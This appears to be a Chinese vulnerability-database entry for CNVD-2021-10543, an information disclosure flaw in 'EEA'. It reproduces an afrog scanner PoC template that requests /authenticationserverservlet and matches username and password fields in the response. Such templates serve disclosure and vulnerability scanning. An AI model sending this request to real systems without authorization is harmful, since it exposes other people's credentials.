CNVD-2021-10543: EEA Information Disclosure

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

EEA 存在信息泄露漏洞,攻击者可通过该漏洞获取系统敏感信息。

PoC代码[已公开]

id: CNVD-2021-10543

info:
  name: EEA Information Disclosure
  author: Search?=Null
  severity: high
  description: |-
    EEA 存在信息泄露漏洞,攻击者可通过该漏洞获取系统敏感信息。
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
  tags: cnvd,cnvd2021,eea,disclosure
  created: 2021/10/23

rules:
  r0:
    request:
      method: GET
      path: /authenticationserverservlet
    expression: response.status == 200 && "<username>(.*?)</username>".bmatches(response.body) && "<password>(.*?)</password>".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-10543.yaml